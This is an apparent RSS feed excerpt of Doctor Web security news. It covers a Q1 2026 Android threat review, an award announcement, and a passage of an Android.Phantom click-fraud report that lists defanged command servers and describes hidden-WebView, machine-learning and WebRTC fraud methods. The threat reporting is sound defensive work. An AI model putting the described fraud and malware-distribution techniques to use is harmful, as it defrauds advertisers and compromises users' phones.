&lt;p&gt;The most frequently detected adware programs were &lt;a href="https://vms.drweb.com/search/?q=Adware.Bastion&amp;lng=en"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; optimization apps. These periodically create notifications containing misleading messages that inform users about alleged low memory and system errors. Their goal is to display ads during “optimization”. Another popular adware was &lt;b&gt;Adware.Opensite.15&lt;/b&gt;—programs which cybercriminals pass off as cheat tools for obtaining resources in games. In reality, such apps load various ad-filled websites. &lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;—programs with built-in ad-displaying modules—were also widespread once again.&lt;/p&gt;

&lt;p&gt;In January, Doctor Web &lt;a href="https://news.drweb.com/show/?i=15110&amp;lng=en" target="_blank"&gt;informed&lt;/a&gt; users about a new family of trojan clickers, dubbed &lt;b&gt;Android.Phantom&lt;/b&gt;. Our virus analysts identified several distribution sources for these malicious apps. One was the official app catalog for Xiaomi devices—GetApps, where the trojans were found to be embedded in several games. Moreover, threat actors distributed the clickers within the mods of popular software via various Telegram channels, Discord servers, online software collections, and malicious websites.&lt;/p&gt;

&lt;p&gt;Using &lt;b&gt;Android.Phantom&lt;/b&gt; trojans, cybercriminals manipulate ad clicks on websites with the help of both machine-learning technologies and WebRTC, a technology for transmitting streaming data (including video) through a browser. The trojans load target websites along with JavaScript code for simulating user actions in WebView. Interaction with ads occurs in one of two modes. If a device supports WebRTC, &lt;b&gt;Android.Phantom&lt;/b&gt; clickers broadcast a virtual screen with the loaded website to the attackers, who then control the website manually or using an automated system.&lt;/p&gt;

&lt;p&gt;If WebRTC is not available, automated JavaScript built on the TensorFlow.js framework is used instead. The clickers download the required behavioral model from a remote server, together with the JavaScript containing the framework itself and all the functions needed to run the model and interact with the target sites.&lt;/p&gt;

&lt;p&gt;Over the course of Q1, Doctor Web’s anti-virus laboratory identified new threats on Google Play. Among them were many &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; trojans as well as the malicious apps &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;. All of them are designed to subscribe users to paid services.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principal trends of Q1 2026&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans became the most common Android threats.&lt;/li&gt;
        &lt;li&gt;Cybercriminals have begun using Android app modding tools more often to protect banking trojans.&lt;/li&gt;
        &lt;li&gt;The ad-displaying trojans &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; continued to be less active.&lt;/li&gt;
        &lt;li&gt;The spread of &lt;b&gt;Android.Phantom&lt;/b&gt; trojan apps, which utilize machine learning and video broadcasts to boost clicks on websites, was notable.&lt;/li&gt;
        &lt;li&gt;New malware was detected on Google Play.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;According to statistics collected by Dr.Web Security Space for mobile devices&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A banking trojan that intercepts SMS containing one-time codes from credit organizations, hijacks the contents of notifications, and collects other confidential information. This includes technical data about the infected device, the list of installed apps, and information about the SIM card, phone calls, and sent and received SMS.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A trojan app that loads the website hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A trojan app designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for an obfuscator used to protect apps, including malicious ones (for example, some &lt;b&gt;Android.SpyMax&lt;/b&gt; banking trojan versions).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Click&amp;lng=en"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for malicious &lt;em&gt;WhatsApp&lt;/em&gt; messenger mods that can covertly load various websites in the background.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, modders can remotely manage these apps—blocking them, displaying custom dialogs, tracking when other software is being installed or removed from a device, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;An application designed to monitor the activity of Android device owners. It allows intruders to read SMS, collect call information, track device location, and record the surroundings.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Obfuscator.TrashCode&amp;lng=en"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Obfuscator.TrashCode&amp;lng=en"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for Android programs to which junk code has been added, using hacker tools for modifying Android apps. Such modification is performed to scramble the apps’ logic. This technique is often found in banking trojans and pirated software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. This tool contains modules for obfuscating and protecting the apps’ code as well as for bypassing their digital signature verification after they have been modified. The obfuscation it adds is often used to make the malware more difficult to detect and analyze.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change the logic of their work or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads from the Internet specially prepared scripts, which can be crafted and added to a common database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Bastion&amp;lng=en"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for optimization programs that periodically create notifications containing misleading messages. They inform users about alleged low memory and system errors in order to display ads during “optimization”.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;An adware module that can be built into Android apps. It displays notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, this module collects a variety of confidential data and is able to download other apps and initiate their installation.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Apps passed off as cheat tools for obtaining resources in games. In fact, they are created to display ads. These programs receive a configuration from a remote server and use it to open a target website containing ads like banners, pop-up windows, video clips, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;An adware module that malicious actors embed into cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware modules that can be built into Android apps and display various ads. Depending on the modules’ version and modification, these can be notifications containing ads, pop-up windows or banners. Malicious actors often use these modules to distribute malware by offering their potential victims diverse software for installation. Moreover, such modules collect personal information and send it to a remote server.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Threats on Google Play&lt;/h3&gt;

&lt;p&gt;In Q1 2026, Doctor Web’s anti-virus laboratory experts discovered more &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; malicious programs, which subscribe victims to paid services. The trojans were concealed in a number of tools for optimizing the operation of Android devices, and were distributed under the guise of messengers, multimedia, and other software. In total, they have been installed at least 370,000 times.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.1.jpg"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.1.jpg"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Examples of &lt;b&gt;Android.Joker&lt;/b&gt; malware detected on Google Play in Q1 2026. &lt;b&gt;Android.Joker.2511&lt;/b&gt; was built into the messenger Private Chat Message, and &lt;b&gt;Android.Joker.2524&lt;/b&gt;—into the camera app Magic Camera&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Moreover, our malware analysts discovered the malicious programs &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;, which are also designed to subscribe users to paid services. These trojans load websites, where a paid mobile subscription is activated with the help of Wap Click technology. On these sites, users are asked to provide their mobile phone number, after which an attempt is made to automatically activate a subscription. Both trojans were downloaded from Google Play over 1.5 million times in total.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;The &lt;b&gt;Android.Subscription.23&lt;/b&gt; and &lt;b&gt;Android.Subscription.24&lt;/b&gt; malicious programs were distributed as Stream Hive and Prime Link, apps for managing personal finances, but their only functionality was loading websites to subscribe Android device owners to paid mobile services&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q1%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15134&amp;lng=en</guid><title>Dr.Web for personal computers receives SKD AWARDS product excellence distinction</title><link>https://news.drweb.com/show/?i=15134&amp;lng=en&amp;c=5</link><pubDate>Tue, 24 Mar 2026 16:18:54 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;The comprehensive antivirus solution &lt;a href="https://products.drweb.com/win/security_space?os=windows32#ss_demo"&gt;Dr.Web Security Space&lt;/a&gt; was once again given an SKD AWARDS industry honour. The antivirus was recognised as best product in the “Personal Computer Security” category.&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Doctor Web has managed to win this award three years in a row. Back in &lt;a href="https://news.drweb.com/show/?i=14677"&gt;2023&lt;/a&gt;, Dr.Web Security Space 12.0 for Windows prevailed in the Personal Computer Security category; in &lt;a href="https://news.drweb.com/show/?i=14800"&gt;2024&lt;/a&gt;, the antivirus solution for desktops and laptops was once again recognised as best product, whilst Dr.Web Mobile Engine SDK came out on top in the Antivirus Engines category.&amp;nbsp;&lt;/p&gt;&lt;p&gt;SKD AWARDS is hosted annually by SKD Labs, an internationally recognised independent information security testing and certification laboratory. Unofficially, this award is often referred to as the “Oscar for Cybersecurity products”. 
It is regarded as one of the key credibility markers that indicate superior quality.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Participating products undergo a series of tests that evaluate their features, performance, technical innovation, behaviour in real-life scenarios, and ability to detect and eliminate threats.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/f2_admin/drweb-ss.jpg" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/drweb-ss.jpg" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15110&amp;lng=en</guid><title>Android.Phantom trojans are bundled with modded games and popular apps to infiltrate smartphones. They use machine learning and video broadcasts to engage in click fraud</title><link>https://news.drweb.com/show/?i=15110&amp;lng=en&amp;c=5</link><pubDate>Wed, 21 Jan 2026 05:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;January 21, 2025&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;newslead&gt;Experts at the Doctor Web antivirus laboratory have discovered and investigated a new trojan clicker malware family. All of these trojans either are administered via the &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; server or get downloaded and launched after the corresponding instruction is received from the remote host. 
Malware belonging to this family infects Android smartphones.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Xiaomi’s GetApps software catalogue is one of its principal distribution channels.&lt;/p&gt;&lt;div class="img img-two-v same-height mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;We have been able to identify multiple games that contain the trojans. They include: Creation Magic World (over 32k downloads), Cute Pet House (over 34k downloads), Amazing Unicorn Party (over 13k downloads), Sakura Dream Academy (over 4k downloads), Theft Auto Mafia (more than 61k downloads), and Open World Gangsters (over 11k downloads). All of the compromised games appear to have been uploaded by a single developer—SHENZHEN RUIREN NETWORK CO., LTD. The trojans are bundled with the apps and start alongside them.&lt;/p&gt;&lt;p&gt;It is also worth mentioning that the original versions of the above-listed titles contained no malicious code. On September 28-29, the developer rolled out game updates that contained the&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;trojan. This malicious program can operate in two modes that are designated in its code as the signalling and phantom modes.&lt;/p&gt;&lt;p&gt;In phantom mode, the malware uses its hidden WebView widget to load web content. 
Upon receiving a corresponding command from the server &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;, it loads a click fraud target site and downloads a JavaScript file named “phantom”. The file incorporates an automation script for interacting with ads on the site as well as the TensorFlowJS machine learning framework. The framework model is downloaded to the app’s directory from the server &lt;span class="string"&gt;hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com&lt;/span&gt;. To work with certain types of ads,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;outputs the content to a virtual screen and takes screenshots. The trojan will then use TensorFlowJS routines to analyse them and tap on the identified relevant elements.&lt;/p&gt;&lt;p&gt;In signalling mode, the trojan employs WebRTC to connect to a third-party server. This technology enables browsers and other apps to establish peer-to-peer connections and exchange data, audio, and video in real time with no additional software needing to be installed. When the signalling mode is enabled, the previously mentioned server &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; acts as a central server to help the WebRTC nodes find each other. This server also determines whether the trojan should run in phantom or signalling mode. Tasks related to targeted sites are provided by &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;. Then&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;covertly transmits to the perpetrators a video showing a loaded website on a virtual screen. 
The trojan allows the connected WebRTC peer to remotely control the browser on the virtual screen: tap, scroll, and enter or paste text into the input form.&lt;/p&gt;&lt;p&gt;On October 15-16, yet another update was released for the above-mentioned games. In addition to&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;, they delivered the&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&amp;nbsp;module. It is a dropper that retrieves&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.4.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;from other remote hosts. This malicious program downloads several other click-fraud trojans to operate on various sites. These modules feature a simpler design compared to&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;—they're not enhanced with machine learning and streaming features but rely on pre-defined click-fraud routines in JavaScript.&lt;/p&gt;&lt;p&gt;To use WebRTC, the trojan requires the Java API, which is not shipped with Android by default and normally doesn't get downloaded with apps. That’s why at first, the trojan mostly ran in phantom mode. 
However, once&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&amp;nbsp;had been introduced into the apps,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;was further enhanced with the&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.4.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;dropper that delivered the API library it required.&lt;/p&gt;&lt;p&gt;Attackers also use other distribution channels to spread&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;and&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. For example, Spotify app mods with premium features unlocked are made available on various sites and in Telegram channels, including:&lt;/p&gt;&lt;div class="flex justify-center gap-3"&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Plus&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify 
Pro&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Telegram channels:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Pro&lt;/i&gt;&lt;br&gt;&lt;i&gt;(54,400 subscribers)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Plus – Official&lt;/i&gt;&lt;br&gt;&lt;i&gt;(15,057 subscribers)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;The altered Spotify app that perpetrators offer on the websites and in the Telegram channels is bundled with&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;and the WebRTC library.&lt;/p&gt;&lt;p&gt;In addition to the Spotify app mods, attackers also incorporate trojans into modified apps for other popular streaming services, including YouTube, Deezer, Netflix and more. 
These are usually available on portals offering modded APK files:&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Apkmody&lt;/i&gt;&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Moddroid&lt;/i&gt;&lt;/p&gt;&lt;p&gt;The Moddroid portal features the “Editor's Choice” section. Only 4 of the editor’s 20 picks proved to be malware-free. The remaining 16 contained &lt;strong&gt;Android.Phantom&lt;/strong&gt; trojans. The apps found on these two sites are loaded from the same CDN server at &lt;span class="string"&gt;hxxps[:]//cdn[.]topmongo[.]com&lt;/span&gt;. 
